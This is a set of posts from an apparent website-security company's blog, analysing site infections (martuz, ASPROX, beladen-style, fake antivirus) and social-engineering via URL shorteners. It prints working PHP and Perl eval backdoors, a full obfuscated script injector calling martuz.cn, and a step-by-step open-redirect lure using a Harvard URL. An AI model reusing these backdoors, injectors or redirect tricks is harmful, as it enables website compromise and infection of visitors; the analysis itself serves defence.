Over the past few days we’ve cleaned 312 infected websites all with the script:

(spaces added so it doesn’t set an alarm with your anti-virus program).

As of right now the following sites don’t recognize vancouvererrorsonfile.com as being malicious:

• Google
• Norton
• rfc_ignorant
• malc0de

However, McAfee’s SiteAdvisor and hpHosts do recognize it as being malicious.

At first it appeared that it was specific to one or two hosting providers, however as the infection carried on, we found it on at least 12 different hosting provider’s networks.

Looking at the server where this site is hosted, reveals other domains that have been used in various malscripts as well:

• dottasink.net
• nowisisdudescars.com
• onlineisdudescars.com

and a few others.

These domains are all registered by the same person: hilarykneber@yahoo.com. This person is the contact person on whois records for 337 domains.

The name servers for vancouvererrorsonfile.com are:

• ns1.masterhostingit.ru
• ns2.masterhostingit.ru

Our service contiues to see these infections and clean them, even though these domains are not yet registered within Google’s Safe Browsing malware list. They have been submitted.

If you are infected with this, you can contact me at traef@wewatchyourwebsite.com and we will clean it for you.

If you have any other information to submit, please feel free to post comments.

Thank you.

Over the past week we’ve been seeing a lot of infected websites that have an iframe that contains one of these two URLs:

nutcountry.ru:8080/index.php parkperson.ru:8080/index.php

A little searching found that approximately 25,000 web pages have the nutcountry.ru:8080/index.php iframe and another 516 web pages reference parkperson.ru:8080/index.php iframe.

What’s interesting is that none of the websites listed in the Google search for either of these two iframes, are listed with “this site may harm your computer” label.

We checked the Google Safe Browsing Diagnostic for nutcountry.ru and it shows:

It appears that Google just listed nutcountry.ru on 8-03-2010 which would explain why the web pages listed in a Google search aren’t showing the warning, “this site may harm your computer”.

And for parkperson.ru we found this:

parkperson.ru Google Safe Browsing Diagnostic page

Shows that as of 8-04-2010, Google has not found this site to be harmful or suspicious.

We attempted to download the files from parkperson.ru, or watch what infection might occur if visited and found that the domain does not exist and neither does nutcountry.ru.

What does all this mean?

It means, that over 25,000 websites were infected, but with an iframe that is harmless because the URL inside the iframe doesn’t go anywhere.

The other interesting aspect of this infection is that all the web pages appear to be ASP code (.asp or .aspx). Based on the location of the harmless iframes, it appears to be another ASPROX infection.

If it is ASPROX, you’ll probably see the iframe in your SQL database. Based on the location of where the iframe appears in the web pages, it’s not a simple iframe injection. The iframe is actually buried in your SQL database. This will make it more difficult to remove. You should consult the services of a database administrator or a security company that knows SQL (yes we do!).

The next thing will be to determine how the code was inserted. This type of infection is referred to SQL injection. This happens when the input from a form or dynamically generated web page isn’t properly sanitized. If there’s a code plugin you’re using, or utilizing some standard software package in your .ASP code, please check for security updates. If you’ve had a programmer create something for you, contact them and have them check over all the code they created for you. Some where on your site you have a SQL injection vulnerability and it needs to be closed.

As stated, this time, the domains included in the iframe don’t exist. However, the next time, your visitors could get infected and your site could be blacklisted by Google and many other services.

If you need assistance with this, please send me an email at traef@wewatchyourwebsite.com.

If you have other information about this infection, please post it as a comment.

Thank you.

This attack isn’t anything new, it was used on a number of Italian sites in March 2010, but we’ve been seeing more of it infecting websites recently so I thought I’d elaborate.

Quite often when scanning or cleaning infected websites, when we see the mailcheck.php file, we also see the chat.pl file but that isn’t cast in stone. However, we have not seen chat.pl by itself. In other words, mailcheck.php can appear by itself, but chat.pl does not – at least from what we’ve seen.

The mailcheck.php files usually contains this code:

Which deobfuscates to:

if(isset($COOKIE[“PHPSESSIID”])){eval(base64_decode($COOKIE[“PHPSESSIID”]));exit;}

The chat.pl file is programmed in Perl and looks like:

#!/usr/bin/perl use MIME::Base64 ();eval MIME::Base64::decode("JGMgPSAkRU5WeyJIVFRQX0NPT0tJRSJ9O0BjID0gc3BsaXQgLzsvLCAkYztmb3JlYWNoICRhIChA\nYyl7JGEgPX4gbS9QSFBTRVNTSUlEPSguKikvO2lmIChsZW5ndGgoJDEpID4gMCkge2V2YWwgTUlN\nRTo6QmFzZTY0OjpkZWNvZGUoJDEpO2RpZSAiIjt9fQ=="); $P = "Lf'njItkk"; $WinNT = 0; $NTCmdSep = "&"; $UnixCmdSep = ";"; $CommandTimeoutDuration = 120; $ShowDynamicOutput = 1;

As you can see, this code also uses the base64 decoding even though in it’s written in Perl. Same strategy, different programming language.

With the infection of mailcheck.php and/or chat.pl, we’ve seen a number of .php and sometimes even .html files that have some PHP code inserted across the top of the file that looks like:

<?php ob_start(‘security_update’); function security_update($buffer){return $buffer.’<script language=”javascript”>function t()…

On Wednesday July 22, 2009 we started seeing what looks to be a new round of beladen style website infections by cybercriminals.

The reason we think they’re beladen style is that they appear to infect all the websites on shared servers and they also seem to be remotely controlled with a “on as needed” mode.

This infection resulted in thousands more sites being tagged with Google’s “This site may harm your computer”.

According to Google Diagnostics for certain websites we were asked to help with, this is what was shown:

“Malicious software is hosted on 4 domain(s), including: ventsol.info/, ina6co.com/, goscansoon.com/.”

Other sites we were asked to help with were also showing these domains in their Google Diagnostics:

• daobrains.info/
• safetyshareonline.com/
• goslimscan.com/
• goscansome.com/
• globalsecurityscans.com/

Our scanners were detecting suspicious obfuscated javascript on the sites we were helping with, but it appeared to only be setting cookies to expire the following day. The obfuscated javascript was this:

Which deobfuscated looks like:

sessionid=39128605A531; path=/; expires=Thu, 23 Jul 2009 18:42:32 GMT

We found similar code with various names for the “var” part (replacing oigmlob) above in the obfuscated code. Other names were:

• dtxzidl
• bmno
• wcdg
• tpet
• stqfpbc
• meuhgor

In addition, we also saw various combinations of the hexidecimal numbers to replace the actual letters. For instance, instead of pa\x74h=/\x3b ex\x70ir\x65s we found these as well:

• p\x61th=/\x3b exp\x69r\x65s
• p\x61\x74h=/\x3b \x65x\x70i\x72es
• p\x61t\x68=/\x3b expi\x72e\x73

All of these deobfuscate to: path=/; expires

One common theme was the hosting providers. Wouldn’t you know that a day after we blog about how wrongly accused many hosting providers are for the gumblar, martuz and iframe infections that they actually become the target.

It appears that these recent infections are a server issue and not just a specific website on a shared server. How the server became infected is purely speculation. Could it have been from one set of compromised FTP credentials that was able to infect the server and then control other sites as well? Could it have been SQL injection for one site that then gave the attackers a method to start a process on the server thereby controlling all the websites on that server?

Who knows. At this point all we do know is that this does affect all the websites on infected servers.

How do we know that?

We created a program for situations like this. It grabs a list of all the websites for a specific IP address and starts checking them. On some IP addresses 91% of the websites were showing the obfuscated cookie code from above. Our thought is that since this is an “on again – off again” type of infection, the other 9% were dormant when our program scanned those sites.

Another interesting observation was that for a specific IP address, each website showed the exact same obfuscated code. While websites on different IP addresses had similar obfuscated code with the slight variations mentioned previously.

The first step in this “drive-by” infection was to set a cookie on the visitor’s PC. Then if that same visitor came back within the expiration period of the cookie (24 hours), this would be delivered to their browser:

Which essentially does a Meta tag redirect. The above deobfuscates to:

We did see some of the other domains mentioned earlier in place of safetyshareonline.com and the goscansoon.com.

The whole purpose of this attack is to infect the PCs of visitor’s to these websites. This is done with this bit of social engineering code:

This code uses some fake graphics (okay the graphics are real, but they’re not the “official” graphics of Microsoft) in an attempt to trick the visitor into believing they have a virus. The code starts by checking to see if the operating system on the visitor’s PC is Microsoft’s Vista. If it is, it displays “Vista” looking graphics. If not Vista, then it assumes Windows XP and shows different graphics.

No matter who you are or what operating system and browser you have, this code shows a window that looks like a “Windows Security Center” window and it informs you that:

 ”Virus (I-Worm.Trojan.b) was found on your computer! Click OK to install System Security Antivirus.” If you select “OK” from their screen it will download their “antivirus”.

If you cancel, a new alert is displayed with this message:

 ”Windows Security Center recommends you to install System Security Antivirus.”

If you cancel that, it will display again.

One more cancel gets you to this message:

“Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it to secure your PC”

This is some very elaborate scheming by hackers and cybercriminals just to get visitors to download their “mother lode of infectious code”, but it will probably work on many people.

We decided to show the code here, although the code is inserted graphic files, so that if your website starts being tagged as suspicious by Google with some of the domains listed here, and you get the “This site may harm your computer” moniker, you can compare this code to some of the code you might see in your site and have a better understanding of what is going on.

What To Do

First you need to contact your hosting provider. Have them read this blog post so they can also better understand what’s going on.

Have them check at the server level for unusual processes running on the server. If you’d like, have them contact us and we can help them diagnose this further. We can show them the other websites on your server that are also infected with the exact same code.

At this point we still don’t know how the server gets infected. Be prudent and scan your PCs with a different anti-virus than what you’re currently using. Why? Because if you are infected and you have anti-virus already installed, then it’s obvious that the virus knows how to evade detection of your current security.

We’ve had good success with AVG, Avast or Avira. If you already have one of those installed, then use one of the others. You need to use something different. Scan and clean all PCs with FTP access to your site.

Then change FTP passwords on all of your accounts.

This will have to be done as soon as you start seeing these infections as it may take some time to fully investigate and remediate – so don’t be late (sorry, it’s been a long few days).

Post comments below if you’ve been infected by this or know someone who has.

Thank you.

Friday July 24, 2009 update: We worked with a couple different hosting providers who had servers infected with this and it appears the way these malscripts are injected into the the webpages is through a process on the server. The cybercriminals have cleverly named this process “crontab” however this process runs under the user name “nobody” typically the same user name that Apache (or httpd) runs as.

The file that executes this process is remotely deleted by the cybercriminals controlling it so it just runs in memory. Once the server is rebooted, the process disappears and doesn’t appear to return. The hosting providers also mentioned implementing suPHP as an aid to blocking this from happening again.

This is quite clever as how many times does a shared server really get rebooted? Probably not very often unless there’s a reason to shut-down numerous (hundreds?) websites all at once.

Keep posted, we’ll be adding more information as we get it.

We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was an infectious website delivering malicious code with an email from Google.

This website owner had tried removing the code himself from the infected webpages and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome,  were greeted with a big warning:

This site may harm your computer.

After about a week of trying to rectify the problem himself, he contacted us.

He provided us FTP access to his site so we could tackle it.

After downloading his site (which literally took 3 hours) we started scanning. We grep’d for the word “base64_decode” and found over 228 php files all with the following malscript:

(php tag removed) if(!fun ct ion_ex ists(‘tmp_lkojfghx’)){if(is set ($_POST['tmp_lkojfghx3'])) eval($_POST['tmp_lkojfghx3']) ;if(!defined(‘TMP_XHGFJOKL’)) define(‘TMP_XHGFJOKL’,b ase64_de cod e(‘PHNjcmlwdCBsYW5ndWFnZT 1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBWaXRMPSclJzt2YXIgU3VvPSd2YXJfMjB hXzNkXzIyU2NyaV83MHRFbmdfNjluZV8yMl8yY2JfM2RfMjJWZXJzaV82Zm4oKStfMjJfMmNqX zNkXzIyXzIyXzJjdV8zZG5hdl82OWdfNjF0XzZmcl8yZV83NV83M182NXJfNDF nZW50XzNiaWYoXzI4dV8yZWluZGV4T2ZfMjhfMjJfNDNocl82Zl82ZGVfMjIpXzNjXzMwXzI5XzI2 XzI2KHVfMmVpbmRfNjV4T2YoXzIyV182OV82ZV8yMilfM2UwKV8yNl8yNl8 yOHVfMmVpbmRleF80Zl82Nl8yOF8yMk5UXzIwNl8yMilfM2MwKV8yNl8yNihfNjRvY183NW1fNjV uXzc0XzJlXzYzb29rXzY5ZV8yZWluXzY0ZXhPZihfMjJtaWVrXzNkMV8yMil fM2NfMzApXzI2XzI2KF83NHlwZW9fNjYoXzdhXzcyXzc2enRzXzI5XzIxXzNkdHlwXzY1b182NihfMjJ BXzIyKSkpXzdienJfNzZ6Xzc0c18zZF8yMkFfMjJfM2Jldl82MWwoXzI yaWYoXzc3aW5kXzZmd18yZV8yMithXzJiXzIyKWpfM2RqK18yMitfNjErXzIyXzRkYWpvcl8yMl8yY mIrYStfMjJNaW5vcl8yMitiK2ErXzIyQl83NWlfNmNkXzIyXzJiYitfMjJ qXzNiXzIyKV8zYmRvY183NW1fNjVfNmVfNzRfMmV3cml0ZShfMjJfM2NfNzNfNjNyaV83MF83NF8y MHNfNzJjXzNkXzJmXzJmbWFyXzIyK18yMl83NF83NXpfMmVfNjNuXzJmdml kXzJmXzNmXzY5ZF8zZF8yMitfNmErXzIyXzNlXzNjXzVjXzJmc2NyaXBfNzRfM2VfMjJfMjlfM2JfN2Qn O2V2YWwodW5lc2NhcGUoU3VvLnJlcGxhY2UoL18vZyxWaXRMKSkpfSk oKTsKIC0tPjwvc2NyaXB0Pg==’));fu nc tion tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(su bstr($s,10,-8)); if(preg_match_all(‘#<script(.*?)</sc ri pt>#is’,$s,$a))for ea ch($a[0] as $v) f(count(exp lo de(“\n”,$v))>5) {$e=preg_match(‘#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_m atch(‘#[\(\[](\s*\d+,){20,}#’,$v); if((pr eg_match(‘#\beval\b#’,$v)&&($e||str pos($v,’from Char Code’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);} $s1=preg_re pl ace(‘#<sc ri pt lan gu age=java scri pt><!– \n\(fun ct ion\(.+?\n –></script>#’,”,$s);if(stristr($s,’<body’)) $s=preg_replace(‘#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,’</body’)||stristr($s,’</title>’)) $s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0) {$s=array();

if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d); foreach(@ob_get_status(1) as $v) if(($a=$v['name'])==’tmp_lkojfghx’)re t urn;else $s[]=array($a==’default output handler’?false:$a); for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’); for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2′) $GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

The base64_decode section evaluates to this:

<script language=javascript><!–

(f u n c t i o n(){var VitL=’%';var Suo=’var_20a_3d_22Scri_70tEng_69ne_22_2cb_3d_22Versi_6fn()+_ 22_2cj_3d_22_22_2cu_3dnav_69g_61t_6fr_2e_75_73_65r_41gent_3bif (_28u_2eindexOf_28_22_43hr_6f_6de_22)_3c_30_29_26_26(u_2eind_65xOf(_22W_69_6e_22) _3e0)_26_26_28u_2eindex_4f_66_28_22NT_206_22)_3c0)_26_26 (_64oc_75m_65n_74_2e_63ook_69e_2ein_64exOf(_22miek_3d1_22)_3c_30)_26_26(_74ypeo _66(_7a_72_76zts_29_21_3dtyp_65o_66(_22A_22))) _7bzr_76z_74s_3d_22A_22_3bev_61l(_22if(_77ind_6fw_2e_22+a_2b_22)j_3dj+_22+_61+_ 22_4dajor_22_2bb+a+_22Minor_22+b+a+_22B_75i_6cd_22_2bb+_22j_3b_22) _3bdoc_75m_65_6e_74_2ewrite(_22_3c_73_63ri_70_74_20s_72c_3d_2f_2fmar_22+_22_ 74_75z_2e_63n_2fvid_2f_3f_69d_3d_22+_6a+_22_3e_3c_5c_2fscrip_74_3e_22_29_3b_7d’; e v a l(un esc ape(Suo.replace(/_/g,VitL)))})(); –></script>

Which deobfuscates to:

var a=”S cri ptE ng ine”,b=”Version()+”,j=”",u=na vi g ator.user A gent;if((u.indexOf(“Ch rome”)<0)&&(u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6″)<0)&& (do cu ment.coo kie.ind exOf(“miek=1″)<0)&&(typeof(zrvzts)!=typeof(“A”))){zrvzts=”A”;ev al(“if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”); doc um ent.w ri te(“<sc ri pt src=//mar”+”tuz.cn/vid/?id=”+j+”><\/script>”);} if(window.Script Engine)j=j+ScriptEng ineMajorVersion()+ScriptEng ineMinorVersion()+Scrip tEngine BuildVersion()+j; <script src=//martuz.cn/vid/?id=></script>

a typical martuz infection.

Using PowerGrep we did a search and replace on this text and replaced every occurrence with “”.

We dug further into the files returned with our search for the word “base64_decode” and found 2 php files in every folder name “images”. These 2 files were named “image.php” and “gifimg.php” and inside each was the following code:

(php tags removed) eval(base64_decode(‘aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1Rb J2UnXSkpOw==’)); (php tags removed)

Which decodes to:

if(isset($_POST['e']))eval(base64_decode($_POST['e']));

Which just decodes whatever text string is POST’d to this file.

To test, we encoded some commands and setup a little script to POST to this form with our commands. It worked!

In addition to these 2 files we found many others in various folders that contained the same code. We’re working on determining how these files are named. It almost seems random, but in order for this to be an automated process we feel that there must be some algorithm in creating the file names. Otherwise, the cybercriminals would have to keep a database or list of each site name and the file name associated with that site. This is highly unlikely as they are into automated routines and keeping a list like that just doesn’t make much sense.

Being that this was martuz, we felt confident in recommending that the client change from FTP to either FTPS or SFTP and then scan their PC fully before accessing the site again. With this new twist of having these php files accept scripts and run them, we are concerned about this new form of infection.

We have seen some people report that you have to replace these php files with an empty file of the same name. That might be the case in some situations, none that we’ve seen, but that would require that the cybercriminals had another file on your site that monitored those files. That monitoring program needs to be found and eliminated.

Another interesting thing about the file names is that WordPress installations have files named image.php obviously with different code, but that tactic might be to deter people from just “willy nilly” deleting those files.

Stay tuned as we have many, many more websites to clean. We’ll be reporting on them as we obtain more information.

Well, the big April 1st “dooms day” has come and gone.

I’ll admit that even though we really didn’t think anything malicious was going to happen, we did add a Conficker scanner to The Box (our security appliance at www.ebasedsecurity.com) so we could scan our client’s systems.

Let me explain our thinking.  We’ve been following Conficker all along the way. From the first strain to the most recent, we’ve been watching with our honeypots – collecting data and samples and determining what could happen. We’ve seen the changes, what it does and how it communicates with it’s “mother ship” waiting for it’s next set of instructions.

When news of Conficker hit mass media, (60 Minutes did a piece on it) our non-technical gut feeling was that the cybercriminals wouldn’t actually do anything malicious with their code. There was too much public awareness.

Keep in mind that if they had, they could have created some real havoc on the Internet. Some experts (my Dad’s definition of an expert is: an ex is a has been and a spirt is a drip under pressure) estimate that anywhere from 10 million to 100 million PCs are infected with Conficker.

If a cybercriminal or a group of cybercriminals have remote control of that many PCs and they decided to launch an attack against some main Internet servers, they could overload them with so much bogus traffic as to basically eliminate them from accessibility.

Now, if they attacked the main DNS servers on the Internet (the servers that convert domain names to IP addresses) could they slow down or shut-down the Internet? Possibly.

However, nothing happened.

Or did it?

What actually happened might be exactly what the cybercriminals wanted.

How many of you did Google searches for Conficker over the past week (the week before April 1)?

Many, many (our research showed that over 1.7 million ) people searched for “conficker scanner” or “conficker removal”, “remove conficker”, “find conficker” and numerous other terms.

Did you realize that many of the search results were offering solutions that actually infected your PC? Many of the websites that were displayed as a result of those search terms were created by the cybercriminals!

Could this have been the real intention of the cybercriminals? If so, this could be the biggest social engineering hack of all time. We examined many of these sites and found a number of them (64%) were selling Conficker scanners and removal tools. All of these “tools” we found were actually RATs (Remote Access Trojans) which actually provided the cybercriminals with remote control of the PC it was installed on.

And, “they” (the cybercriminals) got you to pay for it!

Are these guys geniuses or what?

Many of the sites that weren’t selling bogus removal tools tried to infect any PC that visited their site. These infected webpage sites used a variety of sneaky methods to infect PCs. One instance we found actually tried 17 different attacks on all the PCs visiting it’s infectious website.

If you’ve been following us, you know that legitimate websites serving malware are increasing. This coupled with infected websites serving malware makes the Internet a very dangerous place.

Fortunately for all of our clients with The Box, they don’t have to worry about things like this because The Box doesn’t allow downloads from non-whitelisted websites. What a concept.

That’s what Conficker was and what it wasn’t.

Anyone have comments? (comments that aren’t SPAM)

Continuing on from Round 1, I decided to take a step further and show you exactly how susceptible you are to a socially engineered infection through Twitter. Actually it’s more an attack through TinyURL.com, but since Twitter automatically converts URLs in your Tweets (ugh!), it is an attack via Twitter.

For this example, let’s say that a hacker wants to construct a website that references some research on Harvard’s website. It would be on a topic that is of high interest at the moment.

First the hacker (cybercriminal) would use Google Trends (www.google.com/trends) to see what’s hot. As of today (03/02/2009) the list is as follows:

• granville waiters
• nyc doe
• wavy tv 10
• new york city department of education
• dr. seuss birthday
• opm.gov
• wvec
• nyc public school closings
• nyc board of education
• newport news public schools

These are the top 10.

Nothing in there that is really eye catching that covers a broad scope of people. I’ll use dr. seuss birthday.

Our cybercriminal would construct some basic information about how Harvard University has created this research paper detailing the events behind Dr. Seuss stories. Our cybercriminal needs to have something that already indicates some legitimacy and some validation. For this scenario I’m using Harvard University for 2 reasons; they already carry a huge credibility factor and they have a cross-site scripting (XSS) vulnerability that let’s me use their URL for redirection.

The cybercriminal would take the XSS URL and instead of redirecting the reader to another page inside of Harvard’s website, use it to redirect the unsuspecting reader to their malicious website.

Here is the original URL: http://hms.harvard.edu/lshell/WhitePagesdefault.asp?task=staffandfaculty&theurl=

By appending any URL we want to the end of the above string, it will look like we’re sending you to harvard.edu, however, this vulnerability will actually take you somewhere else.

For instance, if I wanted to send you to my website I would use:

http://hms.harvard.edu/lshell/WhitePagesdefault.asp?task=staffandfaculty&theurl=http://www.wewatchyourwebsite.com

Go ahead and click on that and you’ll see what I mean.

Now, that’s not too bad. I if showed you that link in an email or on my Twitter account, you might not see the end of the URL and just click on it to see what Harvard has to say about Dr. Seuss.

But remember that Twitter uses TinyURL.com which converts any long URLs into “tiny” URLs. Plugging that long URL into TinyURL.com’s website it gives me:

http://www.tinyurl.com/av46js

With TinyURL.com’s preview function I could see the exact URL of the above TinyURL. Maybe you’d see the redirection at the end and maybe not.

Now, our crafty cybercriminal knows that TinyURL.com has this preview function, so he (we’ll assume a male hacker) converts the URL of his malicious website to one you can’t recognize. This is called URL obfuscation (I love using that word).

This would take my URL of http://www.wewatchyourwebsite.com and convert it to: %68%74%74%70%3a%2f%2f%77%77%77%2e%77%65%77%61%74%63%68%79%6f%75%72%77%65%62%73%69%74%65%2e%63%6f%6d

If you saw this by itself, hopefully you’d be suspicious and avoid the urge to click on it. However, when used at the backend of an already long URL, you might just throw caution into the wind and click away.

Our Harvard URL would become:

http://hms.harvard.edu/lshell/WhitePagesdefault.asp?task=staffandfaculty&theurl=%68%74%74%70%3a%2f%2f%77%77%77%2e%77%65%77%61%74%63%68%79%6f%75%72%77%65%62%73%69%74%65%2e%63%6f%6d

Which when converted to a TinyURL.com would result in: http://tinyurl.com/bnq5ej

Go ahead and click on that to see what I mean. As of today, that XSS on Harvard’s site has not been fixed so it will load their frame, but inside will be our home page. Keep in mind that even with TinyURL.com’s preview function, you would only see the obfuscated URL with all the percent signs. This might give you a false sense of security and decide to trust your “gut” and go for it. That’s what the cybercriminal is hoping for.

Obviously our website isn’t going to infect your computer, however, if the redirection URL were to take you to the cybercriminals infectious webpage, you’d be infected and not even know it.

To recap, the purpose of this information is to show you the steps a cybercriminal would follow to use social engineering to spread their malware. They would use Google Trends to find a hot topic, they would use the credibility of some other site, Harvard in this example, they would use obfuscation to hide their work from people who know what to look for and they would use Twitter or some other social networking site to find as many people as they could.

As stated earlier, this isn’t so much a vulnerability of Twitter as it is with TinyURL.com, but since Twitter uses TinyURL.com, it does reflect back on them.

Any comments, questions or remarks? Please post them (unless it’s SPAM).

My first review will be Twitter. I selected Twitter because it’s widely used and even easier for social engineering than some of the others.

First a little background on Twitter. Many people categorize Twitter as a “micro” blog. This means you can post short (140 character) messages that communicate your current thoughts, actions, wants or needs.

From their website Nicholas Carr describes it as “the telegraph system of Web 2.0″ while the New York Times states, “It’s one of the fastest growing phenomena on the Internet.”

The first thing I noticed about Twitter is that most links posted by members are the shortened version of a full URL. Some of the more populare sites for these services are:

• TinyURL.com
• bit.ly
• get-shorty.com
• SnipURL.com

These services take a URL like: http://www.wewatchyourwebsite.com/defacements/HackedByAL-GaRNi-sample-2.jpg and convert it to something like: www.tinyurl.com/88888

Using these shortened URLs on Twitter allows members to include some description with their link.

I’ve always had a problem with these shortened URLs. Having seen numerous SPAM messages with embedded shortened URLs in order to evade detection, I set out to investigate further.

You never know what the ultimate destination is when clicking on these links. You could easily be led to an infectious webpage. Infectious websites are one of the most popular tactics of cybercriminals to deliver their malware.

I scanned our SPAM traps for messages that included these shortened URLs. I used one of our secured systems to see where these links ultimately delivered my browser.

Much to my surprise, all of the links that used TinyURL.com delivered the following message:

“The TinyURL (shows link) you visited was used by it’s creator in violation of our terms of use. TinyURL has a strict no abuse policy and we apologize for the intrusion this user has caused you. Such violation of our terms of use include:

• Spam – Unsolicited Bulk E-mail
• Fraud or Money Making scams
• Malware
• or any other use that is illegal”

This tells me that they’re either policing their links or that they actually take action on misuse of their service – this is awesome. I suggest that before clicking on any TinyURL, replace tinyurl.com with preview.tinyurl.com. For instance if you see a link like: http://www.tinyurl.com/8888, before clicking on it, change the URL to: http://preview.tinyurl.com/8888. The resulting webpage will show you exactly where the link will take you with a link that says, “Proceed to this site.”

I know this is somewhat of an inconvenience, but so is having your PC sending millions of SPAM messages after you’ve been added to a huge botnet.

You see, with any security situation, you always have to consider the risk involved when the potentially weakest link is the responsibility of someone else.

With these shortened URLs, you’re depending on the URL shortening service to provide you with some level of protection.

One other service I investigated, SnipURL.com clearly states on their website:

“SnipURL has a number of operational functions in place to protect the confidentiality of information. However, perfect security on the Internet does not exist, and SnipURL does not warrant that its site is impenetrable or invulnerable to hackers.”

At least they admit that perfect security does not exist, but don’t think that you’re safe clicking on a shortened URL link.

I believe that any free service is going to be exploited by cybercriminals. I’ve seen many times where even fee based services are abused by cybercriminals.

You had better fully trust the person or organization behind the Twitter posting before you blindly click on a shortened link on their site – because you’re either relying on the poster or Twitter. If that little bird in your head is telling you to be careful, you shouldn’t be clicking on it no matter how important you think it might be.

Have you had situations of a security breach on Twitter? If so, let us know by posting a comment.

When we started this service we knew that one of our main goals was to “get the word out” on how websites have been in the line of fire for cybercriminals. We published a report, “How Cybercriminals Use Your Website to Distribute their Malware”, but found not many people were interested in what we had to say. We blamed on it “head in the sand” mentality.

We looked to the Internet Marketing world to see how they do it. Some of them have actually sold thousands of e-books for as much as $27 a piece. They must know some secret that we didn’t.

Our studying introduced us to the works of some big name Internet Marketers (IMers). Names like Frank Kern, Jeff Walker, Brian Clark, Yanik Silver and many others all seemed to resonate one key strategy – build community. On of their favorite strategies is using social networks to build this community of loyal followers.

I shouldn’t say it’s one of their strategies, it’s one of their tactics. Their strategy is to always provide something of value. The social networks is just one way they suggest you use to distribute your valuable message.

Using social networks seemed like a great idea so I set out to explore this value distribution tactic. I did this with my ever present security guard on – that’s how I roll.

My exploration included sites like: Twitter, MySpace, Facebook, LinkedIn and FastPitch.

Over the next few weeks I’ll be revealing my findings and then suggest ways (tactics) you can protect your informational assets while taking advantage of social networks.

I titled this posting “Social Networks & Social Engineering – What a Pair” because many of the tactics of cybercriminals revolve around social engineering which is the art of deceiving others into clicking on a link that you think is safe.

As I write this, I’ve been bombarded with emails about people who received errors while trying to view your profile on Facebook. What happens is when someone clicks on your profile they get an error saying that they could find out the problem by installing the “Error Check System”. You’ll get notifications that “X” number of people have been getting errors while viewing your profile and this “application” will help you determine the cause.

If you Google “Error Check System” Facebook, at least one of the links takes you to an infectious website that will display a message telling you you’re infected with a virus and offers to scan your system. Of course, this is a social engineering attempt. If you agree to the scan, you’ll be downloading a virus. This has been a very popular tactic of cybercriminals lately. They have even started creating websites that offer reviews of anti-virus software – more social engineering, to earn your trust.

I thought the timing of this Facebook “Error Check System” scam was perfect for me to start this series.

Come on back and read the follow-ups.

If you’ve had any experiences with one of the social networking sites, post a comment and let us know.

In the past 2 days we’ve been picking up malicious Adobe Acrobat files also known as PDF’s (the file extension on these files).

We received these files in our honeypots as email attachments and when clicked on they infect Windows XP SP3 systems with Adobe Acrobat 8.1.1, 8.1.2, 8.1.3 and 9.0.0. It appears that disabling JavaScript in your Adobe Acrobat Reader will eliminate the threat that this attack exploits.

To disable JavaScript in Adobe Acrobat Reader, open the program, click on Edit->Preferences->JavaScript then uncheck Enable Acrobat JavaScript. You may experience some program crashes even with JavaScript disabled, however, you will not become infected.

When a computer is infected, it will have these additional files:

1. temp/svchost.exe
2. temp/temp.exe
3. system32/(8 random characters).dll

In addition the infected computer will open a backdoor that will allow the cybercriminal to remotely control the PC (it will become part of a botnet)

Of course, if you’re security system is blocking “exe” downloads from non-whitelisted sites, you don’t have worry about this. (The Box does)